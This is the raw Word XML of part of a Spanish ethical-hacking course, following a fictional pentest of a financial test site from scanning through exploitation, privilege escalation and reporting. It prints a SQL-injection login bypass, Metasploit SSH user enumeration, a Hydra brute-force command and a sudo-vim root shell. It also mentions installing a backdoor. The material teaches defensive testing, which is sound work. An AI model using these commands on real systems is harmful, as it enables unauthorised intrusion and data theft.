    </w:tbl>
    <w:p w14:paraId="3A1CE80E" w14:textId="48BC01EC" w:rsidR="00E24628" w:rsidRPr="00C7690D" w:rsidRDefault="00E24628" w:rsidP="00E24628">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E24628">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultad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E24628" w14:paraId="466BF2B8" w14:textId="77777777" w:rsidTr="00E24628">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E7FD9A5" w14:textId="77777777" w:rsidR="00E24628" w:rsidRPr="00E24628" w:rsidRDefault="00E24628" w:rsidP="00E24628">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E24628">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PORT     STATE SERVICE    VERSION</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59CD4AE2" w14:textId="77777777" w:rsidR="00E24628" w:rsidRPr="00E24628" w:rsidRDefault="00E24628" w:rsidP="00E24628">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E24628">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>22/tcp   open  ssh        OpenSSH 5.3 (vulnerable a CVE-2016-6210)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33BEA5EE" w14:textId="77777777" w:rsidR="00E24628" w:rsidRPr="00E24628" w:rsidRDefault="00E24628" w:rsidP="00E24628">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E24628">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>80/tcp   open  http       Apache 2.2.15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33F06F88" w14:textId="77777777" w:rsidR="00E24628" w:rsidRPr="00E24628" w:rsidRDefault="00E24628" w:rsidP="00E24628">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E24628">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>443/tcp  open  ssl/https  Apache 2.2.15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3600593B" w14:textId="29F3869B" w:rsidR="00E24628" w:rsidRDefault="00E24628" w:rsidP="00E24628">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E24628">
              <w:t>3306/tcp open  mysql      MySQL 5.0.95</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7551D90D" w14:textId="77777777" w:rsidR="00E24628" w:rsidRDefault="00E24628" w:rsidP="00E24628">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56514549" w14:textId="77777777" w:rsidR="00E24628" w:rsidRDefault="00E24628" w:rsidP="00E24628">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E24628">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descubres que:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FA6DAA" w14:textId="77777777" w:rsidR="00E24628" w:rsidRPr="00930EB4" w:rsidRDefault="00E24628">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00930EB4">
        <w:t>El SSH usa una versión antigua con vulnerabilidades conocidas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4671522C" w14:textId="77777777" w:rsidR="00E24628" w:rsidRPr="00930EB4" w:rsidRDefault="00E24628">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00930EB4">
        <w:t>MySQL está expuesto públicamente (¡gran problema!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026D28AA" w14:textId="79CCF21E" w:rsidR="00E24628" w:rsidRDefault="00E24628">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00930EB4">
        <w:t>Apache tiene versión desactualizada</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE27D79" w14:textId="77777777" w:rsidR="00930EB4" w:rsidRPr="00930EB4" w:rsidRDefault="00930EB4" w:rsidP="00930EB4">
      <w:pPr>
        <w:pStyle w:val="whitespace-normal"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00930EB4">
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Nessus - Escaneo de vulnerabilidades:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Textoennegrita"/>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00930EB4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Ejecutas Nessus y encuentra:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F44F97" w14:textId="77777777" w:rsidR="00930EB4" w:rsidRPr="00930EB4" w:rsidRDefault="00930EB4">
      <w:pPr>
        <w:pStyle w:val="whitespace-normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00930EB4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CVE-2016-6210</w:t>
      </w:r>
      <w:r w:rsidRPr="00930EB4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: Vulnerabilidad en OpenSSH que permite enumerar usuarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9E3C61" w14:textId="77777777" w:rsidR="00930EB4" w:rsidRPr="00930EB4" w:rsidRDefault="00930EB4">
      <w:pPr>
        <w:pStyle w:val="whitespace-normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00930EB4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00930EB4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: En el formulario de login de test.finanzasegura.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307F3DFD" w14:textId="77777777" w:rsidR="00930EB4" w:rsidRPr="00930EB4" w:rsidRDefault="00930EB4">
      <w:pPr>
        <w:pStyle w:val="whitespace-normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00930EB4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Certificado SSL expirado</w:t>
      </w:r>
      <w:r w:rsidRPr="00930EB4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: En el subdominio antiguo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFA6BB5" w14:textId="1C79EA5B" w:rsidR="00930EB4" w:rsidRPr="00930EB4" w:rsidRDefault="00930EB4" w:rsidP="00930EB4">
      <w:pPr>
        <w:pStyle w:val="whitespace-normal"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21E04DFD" w14:textId="57B79D5D" w:rsidR="00C7690D" w:rsidRPr="00C7690D" w:rsidRDefault="00C7690D" w:rsidP="00E24628">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B3C3478" w14:textId="77777777" w:rsidR="00555D70" w:rsidRPr="00301CAD" w:rsidRDefault="00555D70" w:rsidP="00156843">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1575D897" w14:textId="77777777" w:rsidR="00555D70" w:rsidRPr="00301CAD" w:rsidRDefault="00555D70" w:rsidP="00156843">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A624827" w14:textId="77777777" w:rsidR="00555D70" w:rsidRPr="00301CAD" w:rsidRDefault="00555D70" w:rsidP="00156843">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5237F732" w14:textId="77777777" w:rsidR="00555D70" w:rsidRPr="00301CAD" w:rsidRDefault="00555D70" w:rsidP="00156843">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="200910D0" w14:textId="77777777" w:rsidR="00555D70" w:rsidRPr="00301CAD" w:rsidRDefault="00555D70" w:rsidP="00156843">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4602D8ED" w14:textId="77777777" w:rsidR="00555D70" w:rsidRPr="00301CAD" w:rsidRDefault="00555D70" w:rsidP="00156843">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="609808A3" w14:textId="77777777" w:rsidR="00555D70" w:rsidRPr="00301CAD" w:rsidRDefault="00555D70" w:rsidP="00156843">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="109A5908" w14:textId="77777777" w:rsidR="00555D70" w:rsidRPr="00301CAD" w:rsidRDefault="00555D70" w:rsidP="00156843">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F41075" w14:textId="77777777" w:rsidR="00555D70" w:rsidRPr="00301CAD" w:rsidRDefault="00555D70" w:rsidP="00156843">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="275C0666" w14:textId="77777777" w:rsidR="00555D70" w:rsidRPr="00301CAD" w:rsidRDefault="00555D70" w:rsidP="00156843">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="072C5D69" w14:textId="77777777" w:rsidR="0019419C" w:rsidRDefault="0019419C" w:rsidP="00156843">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75569C11" w14:textId="2090AC2D" w:rsidR="0019419C" w:rsidRPr="0019419C" w:rsidRDefault="0019419C" w:rsidP="0019419C">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1.2.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="0019419C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>EXPLOTACIÓN DE VULNERABILIDADES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DEDDB7" w14:textId="569C7C63" w:rsidR="00555D70" w:rsidRDefault="003B7B4A" w:rsidP="003B7B4A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B7B4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EJEMPLO PRÁCTICO - Explotación Real:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003B7B4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Caso 1: SQL Injection en formulario de login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6552A717" w14:textId="77777777" w:rsidR="003B7B4A" w:rsidRPr="003B7B4A" w:rsidRDefault="003B7B4A" w:rsidP="003B7B4A">
      <w:r w:rsidRPr="003B7B4A">
        <w:t>Encuentras un formulario de login en test.finanzasegura.com/admin/login.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383AB51E" w14:textId="77777777" w:rsidR="003B7B4A" w:rsidRPr="003B7B4A" w:rsidRDefault="003B7B4A" w:rsidP="003B7B4A">
      <w:r w:rsidRPr="003B7B4A">
        <w:t>Pruebas inyección SQ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7B4A" w14:paraId="2AE88F11" w14:textId="77777777" w:rsidTr="003B7B4A">
        <w:trPr>
          <w:trHeight w:val="338"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="283F83A9" w14:textId="77777777" w:rsidR="003B7B4A" w:rsidRPr="003B7B4A" w:rsidRDefault="003B7B4A" w:rsidP="003B7B4A">
            <w:r w:rsidRPr="003B7B4A">
              <w:t>Usuario: admin' OR '1'='1' --</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="051C54A9" w14:textId="27AAC0A4" w:rsidR="003B7B4A" w:rsidRDefault="003B7B4A" w:rsidP="003B7B4A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B7B4A">
              <w:t>Password: cualquiercosa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D9097A5" w14:textId="77777777" w:rsidR="003B7B4A" w:rsidRDefault="003B7B4A" w:rsidP="003B7B4A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E2ECE8" w14:textId="77777777" w:rsidR="003B7B4A" w:rsidRPr="003B7B4A" w:rsidRDefault="003B7B4A" w:rsidP="003B7B4A">
      <w:r w:rsidRPr="003B7B4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">¡Resultado!: </w:t>
      </w:r>
      <w:r w:rsidRPr="003B7B4A">
        <w:t>Bypaseas el login y accedes al panel de administración sin credenciales válidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFFCE76" w14:textId="0C2B6340" w:rsidR="003B7B4A" w:rsidRDefault="003B7B4A" w:rsidP="003B7B4A">
      <w:r w:rsidRPr="003B7B4A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Caso 2: Uso de Metasploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:t>Para explotar el SSH vulner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004F" w14:paraId="339127C3" w14:textId="77777777" w:rsidTr="006C004F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51276243" w14:textId="77777777" w:rsidR="006C004F" w:rsidRPr="006C004F" w:rsidRDefault="006C004F" w:rsidP="006C004F">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C004F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>msfconsole</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EF17F9A" w14:textId="77777777" w:rsidR="006C004F" w:rsidRPr="006C004F" w:rsidRDefault="006C004F" w:rsidP="006C004F">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C004F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>use auxiliary/scanner/ssh/ssh_enumusers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41B919ED" w14:textId="77777777" w:rsidR="006C004F" w:rsidRPr="006C004F" w:rsidRDefault="006C004F" w:rsidP="006C004F">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C004F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>set RHOSTS 192.168.1.50</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="752470FC" w14:textId="77777777" w:rsidR="006C004F" w:rsidRPr="006C004F" w:rsidRDefault="006C004F" w:rsidP="006C004F">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C004F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>set USER_FILE /usr/share/wordlists/usernames.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B25C8B2" w14:textId="120F763A" w:rsidR="006C004F" w:rsidRDefault="006C004F" w:rsidP="006C004F">
            <w:r>
              <w:t>run</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F964644" w14:textId="123DC573" w:rsidR="002F4ACD" w:rsidRPr="003B7B4A" w:rsidRDefault="002F4ACD" w:rsidP="003B7B4A">
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002F4ACD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4ACD">
        <w:t>: Enumeras usuarios válidos: root, admin, jperez, mlopez</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002F4ACD">
        <w:t>Luego usas Hydra para ataque de fuerza bru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4ACD" w:rsidRPr="00B941CC" w14:paraId="501101F7" w14:textId="77777777" w:rsidTr="002F4ACD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52DBA9E1" w14:textId="547A7FCE" w:rsidR="002F4ACD" w:rsidRPr="002F4ACD" w:rsidRDefault="002F4ACD" w:rsidP="003B7B4A">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F4ACD">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>hydra -l jperez -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21C45421" w14:textId="77777777" w:rsidR="002F4ACD" w:rsidRPr="002F4ACD" w:rsidRDefault="002F4ACD" w:rsidP="002F4ACD">
      <w:r w:rsidRPr="00B941CC">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002F4ACD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¡Éxito!</w:t>
      </w:r>
      <w:r w:rsidRPr="002F4ACD">
        <w:t>: Descubres que el usuario "jperez" usa la contraseña "Password123"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FA5BCA" w14:textId="171D1760" w:rsidR="002F4ACD" w:rsidRDefault="002F4ACD" w:rsidP="002F4ACD">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2.5 </w:t>
      </w:r>
      <w:r w:rsidR="004B5F68" w:rsidRPr="004B5F68">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>POST-EXPLOTACIÓN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0C0584" w14:textId="71163A2D" w:rsidR="004B5F68" w:rsidRPr="004B5F68" w:rsidRDefault="004B5F68" w:rsidP="004B5F68">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B5F68">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EJEMPLO PRÁCTICO - Escalada de privilegios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CB1911" w14:textId="5BAE9A5B" w:rsidR="004B5F68" w:rsidRPr="004B5F68" w:rsidRDefault="004B5F68" w:rsidP="003B7B4A">
      <w:r w:rsidRPr="004B5F68">
        <w:t>Una vez dentro del sistema con el usuario "jperez"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5F68" w14:paraId="72D58FF6" w14:textId="77777777" w:rsidTr="004B5F68">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2292A227" w14:textId="77777777" w:rsidR="004B5F68" w:rsidRDefault="004B5F68" w:rsidP="004B5F68">
            <w:r>
              <w:t># Verificas qué comandos puedes ejecutar con sudo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E6369FD" w14:textId="77777777" w:rsidR="004B5F68" w:rsidRDefault="004B5F68" w:rsidP="004B5F68">
            <w:r>
              <w:t>sudo -l</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76E5F51C" w14:textId="77777777" w:rsidR="004B5F68" w:rsidRDefault="004B5F68" w:rsidP="004B5F68"/>
          <w:p w14:paraId="79E57565" w14:textId="6EF92A15" w:rsidR="004B5F68" w:rsidRDefault="004B5F68" w:rsidP="004B5F68">
            <w:r>
              <w:t># Resultado: jperez puede ejecutar /usr/bin/vim como root sin password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="555E6A2A" w14:textId="77777777" w:rsidR="004B5F68" w:rsidRPr="004B5F68" w:rsidRDefault="004B5F68" w:rsidP="004B5F68">
      <w:r w:rsidRPr="004B5F68">
        <w:t>Escalas privileg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5F68" w14:paraId="0E4336AF" w14:textId="77777777" w:rsidTr="004B5F68">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12ACF635" w14:textId="77777777" w:rsidR="004B5F68" w:rsidRDefault="004B5F68" w:rsidP="004B5F68">
            <w:r>
              <w:t>sudo vim</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="106E0069" w14:textId="77777777" w:rsidR="004B5F68" w:rsidRDefault="004B5F68" w:rsidP="004B5F68">
            <w:r>
              <w:t># Dentro de vim, escribes:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30678417" w14:textId="671283FB" w:rsidR="004B5F68" w:rsidRDefault="004B5F68" w:rsidP="004B5F68">
            <w:r>
              <w:t>:!bash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B4B3F42" w14:textId="77777777" w:rsidR="009B1DDE" w:rsidRDefault="009B1DDE" w:rsidP="009B1DDE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B653ED7" w14:textId="77113C82" w:rsidR="009B1DDE" w:rsidRPr="009B1DDE" w:rsidRDefault="009B1DDE" w:rsidP="009B1DDE">
      <w:r w:rsidRPr="009B1DDE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¡Resultado!</w:t>
      </w:r>
      <w:r w:rsidRPr="009B1DDE">
        <w:t>: Ahora eres usuario root (administrador total del sistema)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB6AE56" w14:textId="77777777" w:rsidR="009B1DDE" w:rsidRPr="009B1DDE" w:rsidRDefault="009B1DDE" w:rsidP="009B1DDE">
      <w:r w:rsidRPr="009B1DDE">
        <w:t>Luego:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4ADE1A" w14:textId="77777777" w:rsidR="009B1DDE" w:rsidRPr="009B1DDE" w:rsidRDefault="009B1DDE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1DDE">
        <w:t>Instalas backdoor para mantener acceso persistente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79376282" w14:textId="77777777" w:rsidR="009B1DDE" w:rsidRPr="009B1DDE" w:rsidRDefault="009B1DDE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1DDE">
        <w:t>Extraes base de datos de clientes (en entorno controlado)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCB17FA" w14:textId="77777777" w:rsidR="009B1DDE" w:rsidRPr="009B1DDE" w:rsidRDefault="009B1DDE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1DDE">
        <w:t>Documentas qué información sensible está accesible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7663AA4F" w14:textId="77777777" w:rsidR="009B1DDE" w:rsidRPr="009B1DDE" w:rsidRDefault="009B1DDE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1DDE">
        <w:t>Tomas screenshots como evidencia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206301E9" w14:textId="35359601" w:rsidR="003B7B4A" w:rsidRDefault="009B1DDE" w:rsidP="009B1DDE">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.2.6 ELABORACION DEL REPORTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFA89F0" w14:textId="027F4953" w:rsidR="009B1DDE" w:rsidRDefault="00D014F2" w:rsidP="009B1DDE">
      <w:r w:rsidRPr="00D014F2">
        <w:t>La elaboración de un informe de hacking ético requiere tanto rigor técnico como excelente comunicación, adaptándose a las necesidades específicas de cada organización y a los hallazgos encontrados</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136DC441" w14:textId="1E3B27FA" w:rsidR="00D014F2" w:rsidRDefault="00D014F2" w:rsidP="009B1DDE">
      <w:pPr>
